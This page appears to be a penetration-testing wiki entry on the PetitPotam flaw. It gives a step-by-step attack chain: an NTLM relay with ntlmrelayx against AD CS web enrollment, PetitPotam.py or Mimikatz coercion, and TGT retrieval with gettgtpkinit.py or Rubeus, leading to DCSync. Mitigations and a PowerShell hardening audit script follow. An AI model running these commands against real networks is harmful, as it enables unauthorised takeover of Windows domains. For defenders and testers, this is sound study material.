PetitPotam (CVE-2021-36942) is an LSA spoofing vulnerability that was patched in August of 2021. The flaw allows an unauthenticated attacker to coerce a Domain Controller to authenticate against another host using NTLM over port 445 via the Local Security Authority Remote Protocol (LSARPC) by abusing Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC). This technique allows an unauthenticated attacker to take over a Windows domain where Active Directory Certificate Services (AD CS) is in use.

In the attack, an authentication request from the targeted Domain Controller is relayed to the Certificate Authority (CA) host's Web Enrollment page and makes a Certificate Signing Request (CSR) for a new digital certificate. This certificate can then be used with a tool such as Rubeus or gettgtpkinit.py from PKINITtools to request a TGT for the Domain Controller, which can then be used to achieve domain compromise via a DCSync attack.

Attack

Initial Exploit

We start by setting up the NTLM Relay.

sudo ntlmrelayx.py -debug -smb2support --target http://<ca-hostname>/certsrv/certfnsh.asp --adcs --template DomainController

Now we can run PetitPotam.py.

python3 PetitPotam.py <atk-ip> <dc-ip>

We can also do this step using [[Mimikatz]] on a Windows host.

misc::efs /server:<dc-ip> /connect:<atk-ip>

Getting TGT

If all goes well, we get hold of the Base64-encoded certificate of the Domain Controller.

Linux

We can use this to request a TGT using gettgtpkinit.py

python3 /opt/PKINITtools/gettgtpkinit.py <domain>\<DC-name>$ -pfx-base64 <b64> dc01.ccache

We can then set the KRB5CCNAME environment variable to this .ccache for future auth.

export KRB5CCNAME=dc01.ccache

We can then do pretty much whatever we want including a [[DCSync]] attack!

Windows

We can use [[Rubeus]] to request a TGT with the certificate as well.

.\Rubeus.exe asktgt /user:<DC-name>$ /certificate:<b64-blob> /ptt

Mitigations

First off, the patch for CVE-2021-36942 should be applied to any affected hosts. Below are some further hardening steps that can be taken:

  • To prevent NTLM relay attacks, enable Extended Protection for Authentication and enable Require SSL so that only HTTPS connections are accepted by the Certificate Authority Web Enrollment and Certificate Enrollment Web Service services
  • Disable NTLM authentication on Domain Controllers
  • Disable NTLM on AD CS servers using Group Policy
  • Disable NTLM for IIS on AD CS servers where the Certificate Authority Web Enrollment and Certificate Enrollment Web Service services are in use
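The following audit script is an added example, not part of the original page, that checks the first and last of the hardening steps above on a CA host: whether EPA is required and SSL is enforced on the web enrollment application, and whether incoming NTLM is denied. It assumes the default application path `IIS:\Sites\Default Web Site\CertSrv`, the WebAdministration module, and an elevated PowerShell session.

```powershell
# Added audit script (not from the original page). Assumes the AD CS web enrollment
# application is at the default IIS path and that WebAdministration is installed.
Import-Module WebAdministration

$certSrvPath = 'IIS:\Sites\Default Web Site\CertSrv'   # assumption: default install path
$findings = @()

# IIS attribute values come back either as plain strings or as ConfigurationAttribute
# objects; normalise both to a string for comparison.
function Get-AttrText($attr) {
    if ($null -ne $attr -and $null -ne $attr.Value) { return "$($attr.Value)" }
    return "$attr"
}

# 1. Extended Protection for Authentication on /CertSrv. tokenChecking must be
#    'Require' (enum value 2) so a relayed NTLM handshake fails channel binding.
$epa = Get-AttrText (Get-WebConfigurationProperty -PSPath $certSrvPath `
    -Filter 'system.webServer/security/authentication/windowsAuthentication' `
    -Name 'extendedProtection.tokenChecking')
$findings += [pscustomobject]@{
    Check = 'EPA tokenChecking on CertSrv'; Value = $epa
    Expected = 'Require'; Pass = ($epa -eq 'Require' -or $epa -eq '2')
}

# 2. Require SSL: sslFlags must include 'Ssl' so plain-HTTP enrollment is refused.
$ssl = Get-AttrText (Get-WebConfigurationProperty -PSPath $certSrvPath `
    -Filter 'system.webServer/security/access' -Name 'sslFlags')
$findings += [pscustomobject]@{
    Check = 'Require SSL on CertSrv'; Value = $ssl
    Expected = 'contains Ssl'; Pass = ($ssl -match 'Ssl')
}

# 3. Incoming NTLM restriction on this AD CS server (LSA MSV1_0 policy).
#    2 = Deny all incoming NTLM; 0 or missing = NTLM is still accepted.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$ntlmIn = (Get-ItemProperty -Path $lsa -Name 'RestrictReceivingNTLMTraffic' `
    -ErrorAction SilentlyContinue).RestrictReceivingNTLMTraffic
$findings += [pscustomobject]@{
    Check = 'RestrictReceivingNTLMTraffic'
    Value = if ($null -eq $ntlmIn) { 'not set' } else { "$ntlmIn" }
    Expected = '2 (Deny all)'; Pass = ($ntlmIn -eq 2)
}

$findings | Format-Table -AutoSize
```

Any row with Pass = False points at a setting that still leaves the enrollment endpoint or the host open to the relay described above.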